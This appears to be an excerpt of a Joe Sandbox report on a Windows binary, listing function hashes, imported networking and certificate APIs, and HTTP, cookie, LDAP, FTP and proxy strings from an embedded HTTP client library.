                                        • Opcode ID: 0482b1b62b6ae519898025941bbefb5542d9f6902fe729238a29048143dd3a8a
                                        • Instruction ID: 49a500d87857cce951af1e0ea81347e2bef89d46557ca884746d6c8ba67c4361
                                        • Opcode Fuzzy Hash: 0482b1b62b6ae519898025941bbefb5542d9f6902fe729238a29048143dd3a8a
                                        • Instruction Fuzzy Hash: F411A961E1858641FF51D711E56436A7B60FF857ECF600231E59E86ADADFECE484C700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLastrecv
                                        • String ID:
                                        • API String ID: 2514157807-0
                                        • Opcode ID: 9297357e9789c547a433d17009090a850aba96bb81910332f5902cd5212cb4f3
                                        • Instruction ID: 7aba0bfbf84125c8e18b959e0a43cf4580ce36dfc4381d0de01fbab1bc56e100
                                        • Opcode Fuzzy Hash: 9297357e9789c547a433d17009090a850aba96bb81910332f5902cd5212cb4f3
                                        • Instruction Fuzzy Hash: DCE0DF21F0860942FF289771A8B933812949F88735F644734CA3AC63C0DEAC44D64700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_func__stdio_common_vfprintf
                                        • String ID:
                                        • API String ID: 2168557111-0
                                        • Opcode ID: 3d02d3eb83713d43c77fd4721ff7eee78d3dbed60bee5a5b721cc135446cce2f
                                        • Instruction ID: 21a9460118ec19c62780e7072f3ec4c6c48e6a24fcf763c18e096f7f1676785d
                                        • Opcode Fuzzy Hash: 3d02d3eb83713d43c77fd4721ff7eee78d3dbed60bee5a5b721cc135446cce2f
                                        • Instruction Fuzzy Hash: C1E03932A08B81C2D7008B50F84455AB7A8FF987C8F904135EF8C87A29CFBCD1A5CB40
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: closesocket
                                        • String ID:
                                        • API String ID: 2781271927-0
                                        • Opcode ID: c66370dc830ad94e535e2ad815e95569a5c7930ebc6c8522cb5e8aded36d2ec2
                                        • Instruction ID: 4f9b0c7877c98f5d30599ec174e6167e02c73a52868b1d0ea2f2d5c492a25059
                                        • Opcode Fuzzy Hash: c66370dc830ad94e535e2ad815e95569a5c7930ebc6c8522cb5e8aded36d2ec2
                                        • Instruction Fuzzy Hash: 88019222B1994181EF55DB2BE2983AD2BA0EF88F8CF284031DB0D87297CE68D4958700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: socket
                                        • String ID:
                                        • API String ID: 98920635-0
                                        • Opcode ID: f0bb34100cf0a741a16ee44f1e954a57bc67ddd83bf44124ffd341ded78523cc
                                        • Instruction ID: 0426cbe5d23f0652d6ac550c650c344feb621155f7b333381a20810bb21b6f42
                                        • Opcode Fuzzy Hash: f0bb34100cf0a741a16ee44f1e954a57bc67ddd83bf44124ffd341ded78523cc
                                        • Instruction Fuzzy Hash: 59E0223AE0220182CE08A722C8922B82760BF44B78FA04771C63E433C1CE6CE2669B00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _beginthreadex
                                        • String ID:
                                        • API String ID: 3014514943-0
                                        • Opcode ID: 6b00736407f2214d91860028af48249fbae4847a37a0940c787b6abd9db0cd9c
                                        • Instruction ID: d343da87cc852a7740bbcb2eee6075ffeb768d42943182a5395df6374aaea931
                                        • Opcode Fuzzy Hash: 6b00736407f2214d91860028af48249fbae4847a37a0940c787b6abd9db0cd9c
                                        • Instruction Fuzzy Hash: 97D0C263718A00429B108FA1A844029E251FB88774B484738EE7D827E0DF38D1454600
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ioctlsocket
                                        • String ID:
                                        • API String ID: 3577187118-0
                                        • Opcode ID: ad4c069ad0f4160e7c62cb6453504bdc4280a687206230678d7d671c433c8928
                                        • Instruction ID: 6720482a217232dc8dfa4efb9382691f7724866baeeb4dd8e78ea3835ee3973a
                                        • Opcode Fuzzy Hash: ad4c069ad0f4160e7c62cb6453504bdc4280a687206230678d7d671c433c8928
                                        • Instruction Fuzzy Hash: 5BC08056F14681C2C3445F6154C91876771BFC4308FA56435D50782124DD3CC2E58B40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$fwrite$_strdupmemchrstrncmp
                                        • String ID: $ $ HTTP %3d$ HTTP/%1[23] %d$ HTTP/%1d.%1d%c%3d$ RTSP/%1d.%1d%c%3d$Connection closure while negotiating auth (HTTP 1.0?)$Connection:$Content-Encoding:$Content-Length:$Content-Range:$Content-Type:$Got 417 while waiting for a 100$HTTP$HTTP 1.0, assume close after body$HTTP error before end of send, keep sending$HTTP error before end of send, stop sending$HTTP/$HTTP/1.0 connection set to keep alive!$HTTP/1.0 proxy connection set to keep alive!$HTTP/1.1 proxy connection set close!$Invalid Content-Length: value$Keep sending data to get tossed away!$Last-Modified:$Location:$Lying server, not serving HTTP/2$Mark bundle as not supporting multiuse$Maximum file size exceeded$Negotiate: noauthpersist -> %d, header part: %s$Overflow Content-Length: value!$Persistent-Auth$Proxy-Connection:$Proxy-authenticate:$RTSP/$Received 101$Received HTTP/0.9 when not allowed$Retry-After:$Set-Cookie:$The requested URL returned error: %d$The requested URL returned error: %s$Transfer-Encoding:$Unsupported HTTP version in response$WWW-Authenticate:$close$false$keep-alive$no chunk, no close, no size. Assume close to signal end
                                        • API String ID: 3939785054-690044944
                                        • Opcode ID: 6a72cbcf9002a9611f75e853c7b872236e3054cd818c7053253f7cd7de46e710
                                        • Instruction ID: c96e202f3032aab34700d016cba3d94303276bc89013d5fe960bb08f343a2a81
                                        • Opcode Fuzzy Hash: 6a72cbcf9002a9611f75e853c7b872236e3054cd818c7053253f7cd7de46e710
                                        • Instruction Fuzzy Hash: 69C2AC71A0868285FB608B2699443F92F91EF41B8CF684135CE4D8B2CBDFBDE445EB11
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$_strdup$freestrncmp$_time64callocmallocmemcpystrrchr
                                        • String ID: #HttpOnly_$%4095[^;=] =%4095[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$domain$expires$httponly$localhost$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                        • API String ID: 2059720140-3844637060
                                        • Opcode ID: 875491f4005b451058fe927c7443391be4a7a5e85f4c1cbb66cb3d2a8e153f6d
                                        • Instruction ID: 4b098925e1809d28da46f77e040e27fede155c52fcac285a2b83169d9d056fa8
                                        • Opcode Fuzzy Hash: 875491f4005b451058fe927c7443391be4a7a5e85f4c1cbb66cb3d2a8e153f6d
                                        • Instruction Fuzzy Hash: 2272AF21A18B8685FF628B26D6543B96FA1FF4579CF244135CB8E826D7DFACE444C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$#211$fwrite$#217calloc
                                        • String ID: ;binary$DN: $LDAP local: %s$LDAP local: %s$LDAP local: Cannot connect to %s:%ld$LDAP local: LDAP Vendor = %s ; LDAP Version = %d$LDAP local: bind via ldap_win_bind %s$LDAP local: trying to establish %s connection$LDAP remote: %s$Microsoft Corporation.$There are more than %d entries$cleartext$encrypted
                                        • API String ID: 2742731861-78870445
                                        • Opcode ID: f405d4c1ee1995a0028c1884dbf4717be004cac129fbdb6505203f7f79021bac
                                        • Instruction ID: 934772711941b3f77f70c71f61dd1f5652c6f6f3582767e33ef7954a12fd2dba
                                        • Opcode Fuzzy Hash: f405d4c1ee1995a0028c1884dbf4717be004cac129fbdb6505203f7f79021bac
                                        • Instruction Fuzzy Hash: 6F427936B08B4286FB14DB6294542BD2BA4FF49B9CF604435CE4E97B96EEBCE445C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Xbad_function_call@std@@__std_exception_destroy_invalid_parameter_noinfo_noreturn
                                        • String ID: array$number overflow parsing '$object$object key$object separator
                                        • API String ID: 1664669839-85532522
                                        • Opcode ID: ff3d0cbacaad0d0a51ccb3e8a1d91a7be11594ec6d960498e764185c0d18bc74
                                        • Instruction ID: 2fdce401342a447652ba70405b2797c1b14e11edabfbc49bfceb239f2100cf2a
                                        • Opcode Fuzzy Hash: ff3d0cbacaad0d0a51ccb3e8a1d91a7be11594ec6d960498e764185c0d18bc74
                                        • Instruction Fuzzy Hash: 1DA2B462E18B8686FF10CB69D4843AD2B61FF457A8F604235DA5D47ADADFBCD085C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$memcmp
                                        • String ID: array$number overflow parsing '$object$object key$object separator
                                        • API String ID: 969624648-85532522
                                        • Opcode ID: f9d409bb1570a7bc1a3b700e8076b91a79d4647d5286ea2af65b5e402d2271bc
                                        • Instruction ID: 8f0ecb293cea4c3b9c3221a90ad39104832c6a0eb134f7e347b88b2a56a4e041
                                        • Opcode Fuzzy Hash: f9d409bb1570a7bc1a3b700e8076b91a79d4647d5286ea2af65b5e402d2271bc
                                        • Instruction Fuzzy Hash: D792D662E18B8582EF10CB69D4943AD2B61FF557ACF604231DA6D87ADADFBCD085C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Cert$Certificate$Chain$ErrorFreeLast$EngineStore$CloseContextCreateNameOpenString
                                        • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CertGetCertificateChain error mask: 0x%08x$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Failed to read remote certificate context: %s$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: failed to create certificate chain engine: %s$schannel: failed to create certificate store: %s$schannel: server certificate name verification failed$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
                                        • API String ID: 561913010-2037819326
                                        • Opcode ID: b935490779b87931a9e513bbba229981ddc6e9c0cf9a56c44816dddb722aa26a
                                        • Instruction ID: b465c610e27210fa408c78f069d2788448e320266f2af9f9c35cfed77c02cccb
                                        • Opcode Fuzzy Hash: b935490779b87931a9e513bbba229981ddc6e9c0cf9a56c44816dddb722aa26a
                                        • Instruction Fuzzy Hash: 4142A232A08B4281EB908F16D4402BA7BA5FF44B9CF604535EE6D8779ADFBCE945D700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLastcallocfreegetsockname
                                        • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                        • API String ID: 2454324209-2383553807
                                        • Opcode ID: c19a01eb95568aceb0747d3f50878cc69756e1387af8f720870ff59157fdf996
                                        • Instruction ID: ab155b2421a06896f763f676a4860538bfd13676f8e46c00a9fb8743d48f4066
                                        • Opcode Fuzzy Hash: c19a01eb95568aceb0747d3f50878cc69756e1387af8f720870ff59157fdf996
                                        • Instruction Fuzzy Hash: 5E22C671A0878281EF509B22E4503BE6B61FF45B8CFA54432EE4EC7696EEBCE544C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemallocstrncmp
                                        • String ID: public key hash: sha256//%s$-----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$;sha256//$sha256//
                                        • API String ID: 1436789207-471711153
                                        • Opcode ID: 58d30d26db40d09852eb253e9d0528ffbcf238b4f2f85144f748f00477786c5f
                                        • Instruction ID: c6c2355e87ec211cb7da9ad11e75e91aaa162997aba30d5a67fc6f091ebf4f7f
                                        • Opcode Fuzzy Hash: 58d30d26db40d09852eb253e9d0528ffbcf238b4f2f85144f748f00477786c5f
                                        • Instruction Fuzzy Hash: B6A1A321B0974281FF569B2399643796F90AF85BD8F684431EE4E87B96EFBCE445C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateFile_errnofree
                                        • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: CA file exceeds max size of %u bytes$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to determine size of CA file '%s': %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
                                        • API String ID: 1377488173-902404565
                                        • Opcode ID: a834209b03510363acd86a0650be8dc52f947bcd32ec28d5deee2e8a0e5eb66c
                                        • Instruction ID: 18c6acab316e8689d14e8ed9eeb255b9af061da52abc712cc62df422677c6bda
                                        • Opcode Fuzzy Hash: a834209b03510363acd86a0650be8dc52f947bcd32ec28d5deee2e8a0e5eb66c
                                        • Instruction Fuzzy Hash: 3EB1B432B0874282F7908B66E4446BA6BA5BF48B8CF644435ED4DC7B9ADFBCE505C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$strchr$_strdupmemsetreallocstrncpy$EnvironmentVariabletolower
                                        • String ID: ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy$memory shortage$no_proxy
                                        • API String ID: 1339443121-1021110354
                                        • Opcode ID: 6bc8b8b9fc8dea0811d921a639721ce66a767e2fac15155573d17300a4e66ccc
                                        • Instruction ID: 2077ab8fe16a3e3a0746e68fa6f5fce3027e3ec02fa5d1158809b4737c700b12
                                        • Opcode Fuzzy Hash: 6bc8b8b9fc8dea0811d921a639721ce66a767e2fac15155573d17300a4e66ccc
                                        • Instruction Fuzzy Hash: 3F02A121A0C78285EB61CB12A4543BA6BA4FF95B8CF785435DE8D87786DFBCE044C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$_strdupfopenfseekstrncmpstrtol
                                        • String ID: $CurrentUser$schannel: Failed to import cert file %s, password is bad
                                        • API String ID: 4221717217-4282655970
                                        • Opcode ID: 40a713b8b59d1049f2dd071324f05e575ca4a88e1dc44f461c2b7a7c0fa936f8
                                        • Instruction ID: 3ab92ea3f82cc62c2045e36ce469c0ece7c71ca177be72214bb4714d503b417d
                                        • Opcode Fuzzy Hash: 40a713b8b59d1049f2dd071324f05e575ca4a88e1dc44f461c2b7a7c0fa936f8
                                        • Instruction Fuzzy Hash: 57819F21B0974286FB598F22D8543BA2A90BF45BACF684135CE5E877D2EFBCE454D300
                                        APIs
                                        Strings
                                        Memory Dump Source
